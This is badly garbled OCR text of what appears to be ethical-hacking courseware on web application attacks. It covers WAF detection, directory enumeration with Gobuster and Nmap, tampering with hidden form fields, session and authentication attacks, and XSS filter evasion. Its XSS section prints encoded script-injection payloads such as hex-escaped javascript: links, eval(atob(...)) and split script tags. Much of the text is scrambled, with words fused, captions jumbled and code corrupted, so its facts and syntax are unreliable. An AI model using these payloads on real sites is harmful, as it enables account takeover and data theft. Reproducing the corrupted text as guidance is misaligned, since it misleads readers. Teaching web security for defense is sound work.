sourceforge.net)
#
IDServe(https://www.gre.com)
+
Netcraft(https:/mww.netcraft.com)
Detecting
WebAppFirewallsandProxieson Target
Site
Whilefootprinting
thewebinfrastructure, must discoverthe web application
attackers firewall
of the targetsite to knowthe securitymeasures employed.
andproxy settings
Detecting Proxies
‘Some use proxy servers i n front of their web servers to makethem
organizations
untraceable.Therefore,
whenattackerstry to trace the target's IP address,
whichis
ical andCountermensores
Mackin ©by E-Comel
Copyright
hiddenbehinda proxy,usingfootprinting the attempt wouldprovide
techniques, its
andnot its legitimate
proxy IP address address.
Determine whetheryour target
site is through
routingyour requests proxyservers. To
knowwhether
Thetrace
@
web server is behinda proxy,attackersc an use the
commandsendsa requestto the web server, asking
trace
it to sendbackthe
command.
HITP/1.2 300 ox
Web
Detecting Application
Webapplication
Firewalls
firewalls(WAFs) are securitydevicesdeployed betweenthe clientand
theserver. Thesedevicesare likeIPSthatprovide securityforwebapplications
againsta
wide range of attacks.They traffic,
monitor web server trafficandblockmalicious thus
safeguarding
web
applications
Attackersuse differenttechniques
fromattacks.
to detect web applicationfirewalls in the web
infrastructure.One of thesetechniques involvesexaminingthe cookiesbecausea few
WAFsaddtheir own cookies during communication.Attackerscan view the
client-server
HTTPrequest
‘Another
cookieto observethe presenceof WAF.
methodfor detectinga WAF is byanalyzing
a
the HTTP headerrequest. Most
thus,the server response
firewallsedit HTTPheaderrequests; varies. Hence,an attacker
sendsa requestto a web server, and whenthe server responds to the request,the
response betrays of theweb application
the presence firewall
Attackersusevarious toolssuchas WAFWOOF
to detectthe presence
of a WAFi n front
of a webserver that
hoststhetargetwebsite,
ical andCountermensores
Mackin ©by E-Comel
Copyright
WAFWOOF
Source:https://github.com
WAFWOOF allowsone to identify
and fingerprint a website.It
WAFs protecting
detects
a WAFat anydomain bylooking
forthe following:
*
*
Cookies
Server
cloaking
*
*
Drop
action
Pre-built-in
rules
* codes
Response
Faure16.45: of WAFWOOF
Sereenshot
Youcan alsousethe toolslistedbelowto detectWAFS
in the targetwebinfrastructure:
© SHIELOFY FirewallDetector(https://shielafy.io)
WebApplication
©
‘WhatWaf
(https://github.com)
(https://nmap.ora)
Nmap
HiddenContentDiscovery
Hidden content and functionality not reachablefrom the main visible content can be
discovered
backup
to exploit
archivescontaining
user privileges
snapshots
within the application.
copiesof live files,configurationfiles,and logfiles containing to
Thisallowsan attacker recover
sensitive data,backup
of fileswithin the web root,new functionalitythat is not linked
to the main application, etc
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing fordiscovering
methodsare employed the hidden
content
+
Webspidering/Crawling
Webspiders/crawlers
automaticallydiscoverthe hiddencontent and functionality
by
parsingHTMLformsandclient-side
JavaScript
requests andresponses,
ZedAttackProxy
‘OWASP
Source:https://www.owasp.org
ZedAttackProxy(ZAP)
‘OWASP is an integrated
penetration tool for finding
testing
vulnerabilities It offersautomated
i n web applications. s canners as well as a set of
toolsthat allowyou to find securityvulnerabilitiesmanually,
Attackersuse OWASP
ZAPfor web spidering/crawling to identifyhiddencontent andfunctionality
i n the
targetwebapplication
3)Bepor.
Fle. MewAnse Tes ingot. Ge te,
Sendedveie Soon ase
+] |=
r ave
2
AutomatedScan
QQ)
be youot have
Fae
been amare that sald that you
atackappeaten
untioatace —_[Ripuiwweimoncope
con)@Select.
trations
sider Ue
= mek
iver
most
1foxsrame
options
eae
No heaed
ereievaneine
hury
MAC
5d (Unsure(3)
Signature
S e (3) Ser
+
Hens Ming 6)
excentert-typeoptens
ae Goretseans
RP TP ho
of OWASPZAP
18.46:Sereenshot
Figure
Go Go Do 0 Go Wo Ao wo
‘Some webspidering/crawling
additional toolsare as follows:
Suite(https://portswigger.net)
Burp
© (https://www.owasp.org)
WebScarab
ical andCountermensores
Mackin ©by E-Comel
Copyright
MozendaWebAgent (https://www.mozenda.com)
Builder
(https://www.octoparse.com)
Octoparse
GiantWebCrawl(http://80legs.com)
*
Spidering
Attacker-Directed
Theattackeraccessesall of the application's functionality
anduses an intercepting
proxy to monitor all requestsand responses.The intercepting
proxy parses all of the
application’s
responses andreportsthecontentandfunctionalityit discovers.
Attacker-directedspideringtools
©
OWASP
DetectLoadBalancers
(https://www.owasp.org)
ZedAttackProxy
Using hostcommand
Typethe following
hostcommand the targetdomainis resolving
to determinewhether
to multiple
IPaddresses:
host <target domain>
address 98.138.219.231
address
addr
addres
addres
S
IPVE address 4998:58
TPv6 address ec
1PV6 address 4998
5
IPV6 address 2001:4998:44
TPv6 address 2001:4998
1Pv6 address 2001:4998:44
mail
mail
mail
is
is
1
is handled by
handled by 1
mta7.an0
mtaS ano
handled by 1 mta6.ano
14.47:
Figure Screenshot
showingoutpt ofhostcommand
ical andCountermensores ©
Mackin by E-Comel
Copyright
Usingdigcommand
The digcommandprovides
more detailedresultsthan the host command, Type
the
following
digcommandto determinewhetherthe targetdomainis resolving
to multiple
IPaddresses:
dig <target domain>
Figure
1448: showing utputof digcommand
Screenshot
loadbalancing
Using detector(Ibd)
Source:https://github.com
Ibd(load
balancing detectsif a given domainuses DNSand/orHTTPload
detector)
balancing
via Server:and Date:headerand diffs betweenserver answers. It analyzes
datareceivedfromapplication
responsesto detectloadbalancers.
the following
Type command ofthe targetwebapplication:
to detectloadbalancers
lbd <target domain>
ical andCountermensores
Mackin ©by E-Comel
Copyright
Halberd
Using
14.49:
Figure
showing
the
Screenshot
output ofbd 00
Source:https://github.com
You can use Halberdto identify the real IP addressof load balancers. When
implement
organizations load balancers, their realIP addressis hiddenbehinda virtual
IP address.Oncethe attackersdetermine that the targetorganization is usingload
balancers,theytry to identify
the real IPaddressof the loadbalancers. Halberdcan be
usedto discoverHTTPloadbalancers andtheirIPaddresses.
the following
Type to identify
command of theloadbalancers
the realIPaddress
halberd <target domain>
ical andCountermensores
Mackin ©by E-Comel
Copyright
qkéd
print: 17d0:
[eeeesenees
1850:Screenshot
Figure showing
the outputof Halberd
ool
After identifying behindthe load balancers,
the real IP addresses attackersperform
further
attackso n the target
organization.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Web Applications
Analyze EH
© Analye
the
active
"omtty EntryPoints
functionality
appicatin’ andtechnologes
to identity attacks urfaces
exposed
‘entity
Web Application
j
te atc
surtces
eared ent vrus the soplestrs anther
oct
Examine
URL,
Header,
HTTP
POST
data,
to
querystingparameters, andcookies determine lds
alluserinput
Host
denty HTTPheader thatcan beprocessed bytheapplication
parameters 2 ier inputssuchas
User-Agent,
Referer
Accept,
Accept and
Language, headers
DetermineURLencoding andother
techniques encryption
mesures forsecure webtraffic
implemented
‘Tools
used
1 Ase
Zod
roe
ance tpe/nomosars| tet Ntpe//amonne gee
Module4 1826
Page ical andCountermensores
Mackin Copyright E-Comel
©
by
WebApplications:
Analyze IdentifyServer-Side Technologies
WebApplications:
‘Analyze Server-SideFunctionality CEH
Identify
‘GRUWae
a
: =
Module4 1825
Page tical andCountermensores
Making by Comet
Copyright©
WebApplications:
Analyze FilesandDirectories
Identify
WebApplications:
Analyze WebApplication
Identify
Vulnerabilities
ScanScanning
Tools
WebApplication
Vlnrbity Ontos Pte fap com
Module4 1826
Page tical andCountermensores
Making by Comet
Copyright©
Web Applications:
Analyze CEH
Mapthe AttackSurface
Cureton
nein
tah tek
| At atentton on sae tun, or
snd
‘upnd omental
omiton
ates rote
amide
even
cote,ert
dracon, ese con ter
Senin ste
‘oem
eatin
SeninWisin SeninPaton ais
ical andCountermensores
Mackin ©by E-Comel
Copyright
Commonly usedserver-sidetechnologies
includeActiveServerPages(ASP),
ASP.NET,
ColdFusion, (JSP),
JavaServer Pages PHP,
Python,andRuby o n Rails.
Attackerscan fingerprint
the technologies
active o n the server usingvarious fingerprint
techniquessuchas HTTPfingerprinting,
IdentifyServer-SideFunctionality: functionality
Server-side refersto the abilityof a
server to execute programs
on outputwebpages.Userrequests
stimulatethe scripts
residing
on the web server to displayinteractive web pages or websites.The server
executesserver-side
scripts,whichare invisible
to theuser.
Attackers shouldevaluatethe server-side structure and functionality
by keenly
observingthe applications
revealedto theclient,
IdentifyFiles and Directories: Web servers host web applications,
and
misconfigurationswhile hosting theseweb applications
mayleadto exposureof critical
files anddirectoriesover the Internet. Attackersidentify web application's
the target
filesand directoriesexposed
on the Internet usingvarious automatedtoolssuchas
attackersgather
Gobuster.Suchinformationfurther helps sensitive informationstored
in the filesandfolders.
Identify
WebApplication
Vulnerabilities:Webapplications
are developed usingvarious
technologies
and platforms.
Not following i n the development
practices
secure coding
of web applications
mayleaveflawsthat can be exploited
to perform various typesof
attacks
theAttackSurface:
‘Map Attackers thenmap theattacksurface of thewebapplication
to targetspecific
vulnerableareas. Theyidentify
the various attacksurfaces
uncovered
bythe applications
as wellas thevulnerabilities
associated
with them,
Identify
EntryPointsforUserInput
Webapplication inputgateshelpattackerslaunchvarious typesof injectionattackson the
application. If such inputgatesare vulnerableto attacks, gainingaccess to the applicationis
easy.Thus, during web applicationanalysis,attackerstryto identify
entrypointsfor user input
so that theycan understandhow the web application accepts or handlesthe user input.
Attackersexamine the URL,HTTPheader, query stringparameters, POST data,andcookiesto
determineall the user inputfields.They also identifyHTTP headerparameters that can be
processed bythe application as user inputs,suchas User-Agent, Referer, Accept,Accept-
Language, and Host. Furthermore, theydetermineURL encoding techniques and other
encryption measuresimplemented to secure webtraffic,suchas SSL.Then, theycan findthe
vulnerabilitiespresenti n the inputmechanism and exploit them to gain access to the web
application
Usethe followingtoolsto analyze
the webapplication:
=
Burp Suite(https://portswigger.net)
=
(https://www.owasp.org)
WebScarab
=
(https://www.owasp.org)
OWASPZedAttackProxy
ical andCountermensores
Mackin ©by E-Comel
Copyright
(hetps://www.net-square.com)
httprint
Identify Technologies
Server-Side
Performdetailed
codeto identify server
fingerprinting
andanalyze
the HTTPheadersandHTMLsource
technologies
server-side
Examine directories,
URLsfor file extensions, andotheridentificationinformation
Examinethe error pagemessages
Examine session tokens: JSESSIONID Java, ASPSESSIONID IS server,
~ -
[ASP.NET_Sessionld ASP.NET,
~
PHPSESSID PHP ~
Usetoolssuchas httprint
andWhatWebto identify technologies
server-side
Server
Error
Could
find not
in
thepermission
'/ReportServer’
Application
set namedASP.Net
recition the
Description:
Anunhandedexception duringthe
occurred
ofthe currentwebrequest Pease review stack
the
code
trace formoreinforms
originatedin
Net
ersion
ion: Microsoft
40,30339.1
Framework
ttprint
Screenshot
displaying
FIGURE
1451: error mess
Source:https://www.net-square.com
ical andCountermensores
Mackin ©by E-Comel
Copyright
1452:Screenshotofteint
Figure
WhatWeb
Source:https://github.com
WhatWebscans and iderntifiesweb technologies,
including
content management
systems blogging
(CMS), platforms, packages,
statistic/analytics JavaScriptlibraries,
web
servers, and embeddeddevices.WhatWebhas over 1800 plugins,eachof which
recognizessomething
different. WhatWebalso identifies version numbers,
email
addresses, webframework
account IDs, modules,
SQLerrors, andmore.
ical
Mackin
and Copyright
©
by
E-Come
Countermensores
Identify Functionality
Server-Side
showing
14.53Screenshot
Figure ofWhatWeb
output
After determining
the server-sidetechnologies,
attackerstry to identify the server-side
functionality
educated
to find potential
guesses the
to determine theofweb
vulnerabilities.They
functionality
examine
internalstructure and
page source andURLsandmake
applications.
They the following
use toolsto do so.
=
GNUWeet
Source:https://www.gnu.org
GNUWgetis employed for retrievingfilesusingHTTP,HTTPS, andFTP,whichare the
most
‘can
widely
usedInternet protocols.
cron jobs,
becalledfrom scripts, andterminalswithoutX-Windows
tool;hence,
It is @non-interactive command-line
support,
it
ical andCountermensores
Mackin ©by E-Comel
Copyright
14.54Screenshot
Figure GNUWet commandline
displaying tity tool
(http://softbytelabs.com)
BlackWidow
Pro(http://www.
Teleport tenmax.com)
ExamineURL
SSLcertified
‘An pageURLstarts with https insteadof http.
if a pagecontains a aspx
extension, the application
is likelywritten using ASP.NET.If the query string has a
parameter named
andwill display
showBy,then youcan
the databythatvalue
assume
that
application
the
a is using database
Identify
Figure
14.5:Identity
FilesandDirectories
Sie
Server FunctionalbyexaminingU RL
toolsGobuster
FuzzerNSE
suchas
script and URL andthe Nmap
directoriesofthe targetweb application.
http-enum to identify
filesand
ical andCountermensores
Mackin ©by E-Comel
Copyright
Gobuster
Source:https://github.com
Gobusteris a Go-programming-based directory to perform
scanner that allowsattackers
fast-pacedenumeration ofhiddenfilesanddirectoriesofa targetwebapplication.
Itis a
command-oriented tool usedto brute-forceURIsi n websites,DNSsubdomains, names
ofvirtualhostson thetargetserver, ete.
Runthe followingcommand to retrieve fileanddirectory
namesandtheirstatuscodes:
gobuster-u <target URL> -w common. txt
Figure showing
1456:Screenshot theoutout of Gobuste
Usethe-I flagto retrieve the length
of the body
along
with filesanddirectories:
gobuster -u <target URL> -w common. txt -1
ical andCountermensores
Mackin ©by E-Comel
Copyright
Intpasswd (Status; 403) [size 410]
Intnccess (Status, 403) [size: 410]
1857:Screenshot
Figure theoutput of Gobuster
showing tool
Usethe -s flagto retrieve filesanddirectoriesrelatedto specific
statuscodes:
gobuster -u <target URL> -w
common.
txt -s 200
1858:Screenshot
Figure theoutput of Gobuster
showing tool
Similarly,
the -q and-n flagsc an provide
a quick view of the directories withoutbanner
andstatus
codes.
You can alsooutputthe resultto a n outputfile usingthe flag.
-o
Module4 Page1834 ical andCountermensores
Mackin
© by E-Comel
Copyright
Nmap
Source:https://nmap.org
Attackersuse the Nmap NSEscripthttp-enum to enumerate ajplications,directories
security that
int are
andfilesof webservers
he
target
vulnerabilities
exposed on the Internet.Thus,t hey
webapplication,
c an identify
critical
following
Run the gather
Nmap commandto informationaboutthe exposed
filesand
directoriesofthe targetweb server:
nmap -sV --script=http-enum<target domain or IP. address>
ical andCountermensores
Mackin ©by E-Comel
Copyright
Identify
WebApplication
Vulnerabilities
Attackersusevarious techniques to detectvulnerabilitiesin targetweb applications hostedon
‘web
servers to gain administrator-level
access to the server or retrieve sensitive information
storedon the server. They s can applicationsfor identifyingvulnerabilitiesand detectattack
surfaceso n the targetapplications. Performing comprehensive vulnerability scanningcan
disclosesecurityflawsassociated with executables, binaries, and technologies usedin a web
application.Through scanning,attackerscan alsocatalog
vulnerability differentvulnerabilities,
prioritizethem basedon their threatlevels, anduse themwhile targetinga n application
Attackerscan use toolssuchas Vega, WPScan VulnerabilityDatabase, Arachni,andUniscanto
identify
=
inthe
vulnerabilities
Vega
targetwebapplications.
Source:https://www.subgraph.com
Vega is a free andopen-source web securityscanner andweb security testingplatform
for testingthe security of webapplications. Vegahelps you to find andvalidateSQL
injection, cross-sitescripting (XSS), inadvertentlydisclosedsensitive information, and
other vulnerabilities.It is written in Javaand is GUL-based, and it runs on Linux,OSX,
and Windows.Vega also helps you to find vulnerabilitiessuchas reflectedcross-site
scripting, stored cross-site scripting, blind SQLinjection,remote file include, shell
and TLS/SSL
security
the TLS settings
injection, others.It alsoprobes
forimprovingsecurity
of your servers.
andidentifiesopportunities
1461:Seeenshotof Vegs
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
Someadditional scanningtoolsare as follows:
webapplication
=
=
Vulnerability
WeScan
Database
(https://wpvulndb.com)
Arachni(https://www.arachni-scanner.com)
*
appspider
(https://www.rapid7.com)
*Uniscan(https://sourceforge.net)
Mapthe AttackSurface
Oncethe attackersdetectthe entrypoints,server-side technologies,and functionalities,
they
vulnerabilities
can find their respective andmapthe attack surface a rea of the targetweb
application.
Webapplication analysisthushelps attackersreducetheirattacksurface.Attackers
consider
the
following
factors i n planning
their attack.
Information
Client-SideValidation Injection
Attack
Attack,Authentication
Attack
DatabaseInteraction SQL Injection,DataLeakage
FileUpload
andDownload DirectoryTraversal
of
DisplayUser-Supplied
Redirects
Dynamic
Data Scripting
Cross-Site
Redirection,
HeaderInjection
Login
Session
State
Password
UsernameEnumeration,
Hijacking,
Session SessionFixation
Brute-Force
Attack
Injection Escalation,
Privilege Access
Controls
CleartextCommunication
ErrorMessage
Data
Theft,
Session
Hijacking
Leakage
Information
EmailInteraction EmailInjection
Application
Code Buffer Overflows
Third-Party
Application Exploitation
KnownVulnerabilities
WebServerSoftware KnownVulnerabilitiesExploitation
Table
showing
142:Table information
andrespective
attacks
ical andCountermensores
Mackin ©by E-Comel
Copyright
j
Client-sideControls
Bypass EH
(©.
Aweb application
ant implement
components preven
measuresaffecting
contol data
wth
requires clen-side
cntol to
that
ser
use’
from
inputs
interaction hisor he
transmission
own cent
via clent
‘thi often
sumptionean makeappiations by
|@Webdevelopers think thatthedatatansmited
fromthecent to server
vulnerableto various stacks
is under
contol theuser, ne
evtorm
sure
coe
review beby een wineries athecade hat canna ete
©
vado X55Fits |
HTML fades ers characters
bynectingunarul the oe
7
Client-side
Bypass Controls: (CEH AttackHidden FormFields
Inany e-commerce/retaing
web aplication,
thedevelopefagscertainl d ke productname, andproduct
price hidden theuse fromviewing
to prevent a ndmodiying
theWelds
In
elent
very session, use hidden
developers fds to store een information,
inline pricesand
product
a HTML
page,
T oexpat
by and into
such valneablewebapplications,
save thesourcecode forthe tamperthe pice values
thepricefile's vale,
edting reload thesource browse.
TheBuyb utton canthenbeclickedto
Youcan
get
alsoattemptt o provide
negative
values
i nthe picefd to a refund
fromhe applation
Module4 1838
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
j
Bypass
Client-side Controls:Attack BrowserExtensions
CEH
18 datafroma webapplication
Capturing thatues
browser
extension can beachieved
components bytwo methods
Intercepting
Traffic from Decompiling
Browser
component
and modty
tempt to intercept
bythe as wellas requests
esponses
made
rom the
1 ines tecniqu,youcan
component's
thecomponent
attemptto decompile
to view ts detaled
bytecode
functenaty
the
source,
Usetools
i keBurp
Suit to capture
thedata
modify
data
‘employed
Yeu to ntherequest
present
t o obfuscate
thatare
thetransmitted
or encrypt
]
Client-side Controls:Perform SourceCode Review
Bypass CEH
ofthe
thefllowingfuncionalties components
codeto identify
‘Mosiiabie withhidden
components cent side
Module4 1829
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
Client-sideControls:EvadeXSSFilters
Bypass
(©Many
Embedding
Encoding
Characters
haractersin |)
HTML
Tage (@Usetadscestoevade
Whitespaces
detection:
Manipulating
@ Youcanembeda
scot tag
<iem
fan bewrten i n ASCcode vet sr
fade ters thatsare for sings roa cee
<ececeeript>iptodocunant
we
iesetcle>
eens at
SE Sahin an HTML
c ement
Lie
hexadecima
encoding to Soraret
seastuosaeripe
cucceaeeat Xe5") >
jog" eoloate
<inglarew"pepep.
aah mene
newline
characters:
chracant
ype {etn and
selena
BypassClient-side Controls
application
‘Aweb requiresclient-side
controls whentransmitting
to restrict user inputs datavia
clientcomponents and implementing measuresto controltheuser'sinteraction with hisor her
own client.A developer uses techniques suchas hiddenHTML form fields,andbrowser
extensionsto allowthe transmissionof datato the server via theclient.Often,
web developers
assumethatthedatatransmitted fromtheclientto the server is withinthe user's
control,and
thisassumption can makethe application
vulnerableto various attacks.
Someof the techniques
to bypass
theclient-sidecontrolsare as follows:
‘Attack
HiddenForm Fields:Identify
the tagsandfieldsto exploit
hidden
theweb pagebefore form
fields
on
the webpageandmanipulate
the datato the server.
transmitting
Attack BrowserExtensions:Attemptto interceptthe traffic from the browser
extensionsor decompile
thebrowser u ser data
extensionsto capture
Perform
SourceCodeReview:Perform
source codereview to identify
vulnerabilitiesi n
+
the code
thatbe by
traditional
vulnerability
tools,
cannot identified
EvadeXSSFilters:EvadeXSSfiltersbyinjecting
unusualcharacters
into the HTML code.
scanning
‘Attack
HiddenFormFields
E-commerce/retailing web applicationsuse hiddenHTMLformfieldsto restrict the user to
view,/modify datafieldssuchas “products―
and“prices
of products―
andallowthe user to enter
certain fieldssuchas “quantity,―
assuming that the user enters the required
quantitybefore
from modifying
Information,
the
submitting datato the server. Thedeveloper
them. In every clientsession, developers
including
product
pricesanddiscountrates.
flags
these
as to
fields hidden restrict the user
use hiddenfieldsto store client
ical andCountermensores
Mackin ©by E-Comel
Copyright
Followtheprocess
described
belowto attackhiddenformfields:
=
Identify
vulnerablewebapplications
=
Save
Locate
the source codefor the HTMLpage
thefield hidden
Tamper
‘=
Savethe values
by
editing
source field’s
withtheprice
file andreloadthe
theprice
into a browser
value
Click
toolssuchas Burp
any value. In addition,
applicationrefunding
into
the modify
Suiteto trapthe request thatsubmits formand the pricefieldto
you can attemptto enter negativeprice valuesto trick the retail
through
theamount creditcardtransactions.
‘Attack
BrowserExtensions
Thedatafrom a web application can be captured
that uses browserextension components by
methods:
‘two
‘=
TrafficfromBrowserExtensions
_Intercepting
Attempt intercept
to and modify
the request
and responseof the component
andthe
server, respectively.
You can use tools suchas BurpSuite to capturethe data.This
methodhascertain limitationssuchas dataobfuscationor encryption,
and secure data
serialization.
Decompiling
BrowserExtensions
Using this technique,you can attemptto decompile the component's bytecode to view
its detailed source, which allows you to identify the detailed informationof the
component functionality.
Themain advantage ofthistechnique is that it allowsyou to
modifydata presenti n the requests that are sent to the server, regardless of any
‘obfuscation
or encryptionmechanisms employed forthetransmitted data.
You can use proxy tools suchas BurpSulte to captureand modify the web page
componentrequests. In the context of bypassing client-sideinputvalidationthat is
implemented in a browserextension,i f the component submitsthe validateddata to
the server transparently,this data can be modifiedusingan intercepting proxy i n the
samewayasthat described forHTMLformdata,
PerformSourceCodeReview
Attemptto acquire the source codeof the targetweb application. After acquiring the source
code,examine the codeto understand the components, frameworks, etc., as well as their
workingto identify any existingvulnerabilitiesi n the code.This examination can provide
informationabout various functionalities suchas removing client-side input validation,
submitting
nonstandard datato the server, manipulating client-sidestatesor events, or directly
invoking functionality that is present
withinthe component,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Performsource codereview to identifythefollowingfunctionalities
of a targetcomponent
Client-side inputvalidationor other security-relatedlogics
andevents
=
Obfuscationor encryption techniques that are appliedto the clientdata before it is
=
to
the
transmitted server
Modifiablecomponents with hiddenclient-sidefunctionalities
=
XSS
Evade
to
References server-side
Filters
functionalities
implementations
XSSfilter applied are to webbrowsersto protectthemfrom imminent XSS
attacks;however,attackerscan makethemvulnerablebyinjecting unusualcharacters into the
HTML
code,
through
Attackers
filter
implementations.
whichtheycan evadethe
application
can embedharmfulJavaScript into a web i n manyways.However, the
latestbrowsersare implemented with strongsecurity measures; hence, the scriptinjection
sometimesfails.Therefore,
attackersoftentryto not only
takeadvantage ofapplication design
flawsbut alsobypassinputevaluationprocessesconductedbythe server or applicationto trick
complicatedbrowser
filters.
exploit
XSSattacksusually improperconfigurations implementations
andsecurity ofa browser,
filter bypassing
‘whereas methodsare carriedout byleveraging
flawsi n a server or browser-side
filters, certain versions or products.
targeting
‘A
majorityportionof the browsercodeis written with proper security m easures to handle
abnormalHTML,JavaScript, and CSSto fix them before delivery to the end users. XSSfilter
bypassing
leveragessuchan intricate compositionof specifications,
exceptions,languages, and
otherbrowsercharacteristics scripts
to inject throughthefilterswithout leavinga trace.
techniques
VariousXSSfilter evasion are discussedbelow:
Inserting tagsinto thecodeis not allowedi n a general
<script> context. However,
some other
HTMLtagscan permittheseunusualinjections. Eventhandlersare employed to run specific
scriptscorrespondingto the authorizeduser actions. In general,event handlers suchas
<onfocus>, c an be exploited
<onerror>, and<onclick> to evadeXSS
filters.
=
Encoding
Characters
‘Attackers
can embedvarious charactersi n differentwaysto evade filtersthat focuson
text to detectunwantedstrings.
inspecting Approaches for characterencoding include
the
following:
fewor
‘A all ofthe characters
of HTMLelements c an bewritten usingASCIIcodesto
evadefiltersthat searchfor strings
suchas <javascript>
Hexadecimal
(‘KSS
">
<a href= "¢#106;avascript:alert
ical andCountermensores
Mackin ©by E-Comel
Copyright
Base64encoding can beusedto cover thetracks ofattackcode;it popsup an alert
with “Successful
XSS―
))">
<body onload="eval (atob ( U3Vj¥2Vze2Z1bCBYUIM="
The embeddedcharacterelementsare from numbers1-7, avoiding initial zeros.
of
Therefore,anycomposition zero padding
(‘Successfu
is allowed:
<a href=" 6x6A;avascripts#000005860000097Lert
Click Here!</a>
XSS’)">
onnouseclickzalert
Embedding
(String.
fromCharCode
(88,83,83))></ifz
Whitespaces
whitespace
Browsers allow convenient usageof characterswhile writing
JavaScript
or
HTML code. Thus,attackerscan easilyevade filters by insertingnon-printable
characters.
0 Tabspacesare avoidedwhileprocessing theycan be invokedto split
the code;
keywords.
Consider
this
<img>
tag:
<img src="java__script:al ert (‘Successful xss’)">
Youcan alsoencodethetabspaces:
<ing sre="javacix09;seript:al64x09;ert (‘Successful xSs’)
">
Similarly,
carriage return and newline characters
are not consideredduring
thus,attackerscan alsoencodethesecharacters
processing; in between:
<a href ="javefx0asa
Script: 6#x0A;ales#x0Drt; (‘Successful
XSS')">VAsit xy2.come/a>
‘Manipulating
Tags
XSSfilterevasion can alsobeperformed tagsandskipping
bymanipulating attributes.
© the scriptanddeletescertain tags(mostly
Whenthe filter inspects <script»),placing
themwithinothertags can leavelegitimate
codeafterthey a re deleted
<ser<ecript>ipt>document
.write
Attributesand tagscan be separated
("Successful SS")</ser<seript>ipt>
bysupplying a slashthat helps i n bypassing
restrictions i n valueinsertion:
whitespace
<ing/sec="popup.
2xss"))>
jpg―
also exploit
‘Attackers
onload=4ix6A
:eval fuls#3
;avascript
browserinterpretations
(alert ( ‘Success
ical andCountermensores
Mackin ©by E-Comel
Copyright
AttackAuthenticationMechanism
Sor -
]
and Implementation
Design Flaws in AuthenticationMechanism CEH
bse
BB rassorts EE veerimpennstion
EB erste Force
togin
Verbose
Fale Messages
Improper Vaan
Predictable
ofCedentis
Usernames
andPasswords
DD tannin
secure
Ls]Paseword
ofredentit
ResetMechanism
Insecure
of Distribton Credentials
Fall-open M echanism
Login
Ls]
Remember
M e" Functionality
Insecure
Storage ofCredentials
ical andCountermensores
Mackin ©by E-Comel
Copyright
UsernameEnumeration
singthetlaband-erormethod
1 somespltions avi
-Mtacirs
an determine generate
aconora
thesequence seqvenc
vurramesbeowd
vals eerames
ans enumerate
(ewer, oer) rd
PasswordAttacks:PasswordFunctionality
Exploits
Changing
Password
Tyran
fr Pasword,New
sting ‘ld
New
Paseword and Canimthe
Rls to Pew an nae eos ety
Password
Recovery
‘Remember
Me’
Expl
Module4 1845
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
PasswordAttacks:PasswordGuessing
and Brute-forcing
Pastword Guessing Bretesorcing
td oot
25
such THC S ue,
Mpa,Burp Ltr
Stops
to perform
password
reset poisoningattack:
Module4 1846
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
|
SessionAttacks:SessionID Prediction/Brute-forcing C/E
(Osoof
th
‘esis cptaredsendon detent sexton genrton
proces
vc the aon wr,
Cookie Poisoning
Cookie Exploitation:
|G the
cookie
contains
passwords oF
as
sestionidentifiers,
steal
thecootle
Usingtechniquessuch sept
Injection
and eavesdropping
pasword
sé
Module4 1847
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
Authentication:Bypass
Bypass SAML-basedSSO
CEH
1 (50)
Single
Sign-on authentication
‘Bases
encoding canbe
and easy
aie to bypass
SAWbasedS30
of
combination a username and
=
Username Enumeration
password,
which and
can beidentified exploited.
‘Attackers
can enumerate usernames in two ways: verbosefailure messages
and
predictableusernames.
© VerboseFailureMessage
login
In a typical the user
system, enters two fields,
namely username andpassword
In some cases,an application
will askforadditional information. If the user is trying
to login and fails,it implies
that at least one field was incorrect. Thisprovides
for
an to the
grounds attackerexploit application.
Examples:
*
Account
not <username> found
ical andCountermensores
Mackin ©by E-Comel
Copyright
* provided
Incorrect password
*
Account
has
Predictable
been
locked
out
<username>
Usernames
applications
‘Some automatically
generate account usernames according
to some
predictable
sequence. Thismakesit very easy for the attackerto discernthe
for
a
sequencepotentially
Password
Attacks
all
exhaustivelistof valid usernames,
©
guessing
Password
Brute-force
© attack
Dictionary attack
Attack password
reset mechanism
Attacks
Session
Thefollowing
mechanisms of
types sessionattacksare employed
byattackers authentication
against
©.Session
to
prediction:It
bypass session
focuses
values
that
allow
on predicting
the authenticationmechanismof
understanding
attacker
predict
the session ID generation
an
ID
application.
process,the attackercan
the
Byanalyzing
and
a valid
access
sessionIDvalueandgain
Sessionbrute-forcing:
to the application.
An attackerbrute-forcesthe session ID of a targetuser and
ittologinalegitimate
uses as
userand toapplication.modify
gainaccess the
Sessionpoisoning:It allowsan attackerto injectmalicious content, the
user's onlineexperience,andobtainunauthorized information,
CookieExploitation
exploitation
Cookie attacksare ofthefollowing
types:
© Cookie
poisoning:It is a typeof parameter attackin whichthe attacker
tampering
modifiesthe cookie contents to drawunauthorizedinformationabout a user and
thusperform identitytheft.
Cookiesniffing: It is atechnique
in whichan attackersniffsa cookiecontaining
the
sessionID of the victim whohaslogged websiteandusesthecookieto
i n to a target
bypasstheauthenticationprocess andlogin to thevictim’s
account.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Cookiereplay:
It is a technique a legitimate
usedto impersonate user byreplaying
the session/cookie
that contains the session ID of that user (aslongas he/she
remains logged
in).Thisattackstopsworking once the user logs
out of the session.
=
Bypass
Authentication
©
Bypass SAML-based SSO:Attackerstake advantage misconfigurations,
of signature
sessionexpirytimeouts,s essionreplays,
misdirected
SAMLmessages,etc.,to bypass
SAML-based
SSO
authentication.
Flawsin AuthenticationMechanism
Design
Authentication mechanisms
are more vulnerableto attacksthan other implementations
involved in web application security. Applications usuallyvalidate a user via his/her
login
credentials;even a minor weaknessi n this authenticationprocesscan lead to serious
consequences suchasgranting a ccessto illegitimate
users.
=
BadPasswords: Anyapplication is designedto haveminimum controlover checking and,
validatingthe user credentials. Usersoften come across applications that accept
passwords suchas blankor shortvalues,ordinary names,dictionary words,the same
password as the username, and default parameters. Suchpasswords can be easily
guessed bythe attackers,allowing themto accessthe applicationresources,
Brute-ForcibleLogin:
Theloginfeatureof an application
allowsan attackerto predict
user credentials, through can enter the application
whichtheattacker illegitimately.
If
the application
permitsnumerous loginattemptswithout any restrictions,suchas
blocking
an account aftera certain number
of attempts,attackers
